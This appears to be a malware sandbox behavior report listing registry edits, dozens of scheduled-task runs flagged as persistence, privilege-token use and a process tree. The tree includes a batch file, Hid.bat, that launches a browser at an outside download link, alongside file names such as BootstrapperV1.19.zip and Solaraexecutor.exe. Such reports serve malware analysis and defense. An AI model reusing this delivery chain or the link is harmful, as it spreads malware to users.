description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133791046380546368" chrome.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 59 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings Solaraexecutor.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings PerfNET.exe Key created \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings services.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\BootstrapperV1.19.zip:Zone.Identifier firefox.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 3380 Notepad.exe 984 NOTEPAD.EXE 3404 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 10 IoCs
pid Process 3596 PING.EXE 6068 PING.EXE 2812 PING.EXE 7084 PING.EXE 4852 PING.EXE 5876 PING.EXE 6140 PING.EXE 5200 PING.EXE 3080 PING.EXE 2408 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6600 schtasks.exe 4428 schtasks.exe 4080 schtasks.exe 748 schtasks.exe 6964 schtasks.exe 6108 schtasks.exe 5976 schtasks.exe 3580 schtasks.exe 1860 schtasks.exe 3832 schtasks.exe 1800 schtasks.exe 5356 schtasks.exe 6360 schtasks.exe 1580 schtasks.exe 5956 schtasks.exe 3236 schtasks.exe 4708 schtasks.exe 5116 schtasks.exe 4544 schtasks.exe 5264 schtasks.exe 6496 schtasks.exe 2844 schtasks.exe 2464 schtasks.exe 2088 schtasks.exe 6552 schtasks.exe 4088 schtasks.exe 3328 schtasks.exe 2252 schtasks.exe 1552 schtasks.exe 5572 schtasks.exe 64 schtasks.exe 2312 schtasks.exe 6232 schtasks.exe 5180 schtasks.exe 6536 schtasks.exe 6484 schtasks.exe 3900 schtasks.exe 3420 schtasks.exe 2492 schtasks.exe 6544 schtasks.exe 6500 schtasks.exe 5368 schtasks.exe 4656 schtasks.exe 1656 schtasks.exe 1744 schtasks.exe 6736 schtasks.exe 6564 schtasks.exe 2392 schtasks.exe 5020 schtasks.exe 6732 schtasks.exe 5616 schtasks.exe 5320 schtasks.exe 4364 schtasks.exe 3020 schtasks.exe 3584 schtasks.exe 2976 schtasks.exe 5556 schtasks.exe 5932 schtasks.exe 6600 schtasks.exe 4792 schtasks.exe 6116 schtasks.exe 892 schtasks.exe 4392 schtasks.exe 7064 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3688 msedge.exe 3688 msedge.exe 3304 msedge.exe 3304 msedge.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6064 chrome.exe 6064 chrome.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 6324 7zFM.exe 7160 7zFM.exe 6340 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3304 msedge.exe 3304 msedge.exe 3304 msedge.exe 6064 chrome.exe 6064 chrome.exe 6064 chrome.exe 6064 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3812 firefox.exe Token: SeDebugPrivilege 3812 firefox.exe Token: 33 2072 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2072 AUDIODG.EXE Token: SeDebugPrivilege 3812 firefox.exe Token: SeRestorePrivilege 6324 7zFM.exe Token: 35 6324 7zFM.exe Token: SeSecurityPrivilege 6324 7zFM.exe Token: SeDebugPrivilege 3812 firefox.exe Token: SeDebugPrivilege 3812 firefox.exe Token: SeDebugPrivilege 3812 firefox.exe Token: SeDebugPrivilege 3812 firefox.exe Token: SeDebugPrivilege 6436 taskmgr.exe Token: SeSystemProfilePrivilege 6436 taskmgr.exe Token: SeCreateGlobalPrivilege 6436 taskmgr.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe Token: SeCreatePagefilePrivilege 6064 chrome.exe Token: SeShutdownPrivilege 6064 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3304 msedge.exe 3304 msedge.exe 3304 msedge.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 6324 7zFM.exe 6324 7zFM.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe 6436 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe 3812 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2640 wrote to memory of 3304 2640 cmd.exe 82 PID 2640 wrote to memory of 3304 2640 cmd.exe 82 PID 3304 wrote to memory of 2388 3304 msedge.exe 84 PID 3304 wrote to memory of 2388 3304 msedge.exe 84 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3676 3304 msedge.exe 86 PID 3304 wrote to memory of 3688 3304 msedge.exe 87 PID 3304 wrote to memory of 3688 3304 msedge.exe 87 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 PID 3304 wrote to memory of 2448 3304 msedge.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Hid.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://oxy.name/d/ODii2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x128,0x12c,0xdc,0x130,0x7ffd77b746f8,0x7ffd77b74708,0x7ffd77b747183⤵PID:2388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:23⤵PID:3676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:83⤵PID:2448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:13⤵PID:932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:13⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,1988002871371774138,10506946971577847054,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:13⤵PID:4180
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4992
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4728
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:1244
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:240
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:2844
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3812 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23839 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec173f2f-595c-47cd-a240-071304ebbe8b} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" gpu3⤵PID:2424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2400 -parentBuildID 20240401114208 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {707aa04c-078d-4720-86a7-3011f9e578bb} 3812 "\\.\pipe\gecko-crash-server-pipe.3812" socket3⤵
- Checks processor information in registry
PID:1656
-
-
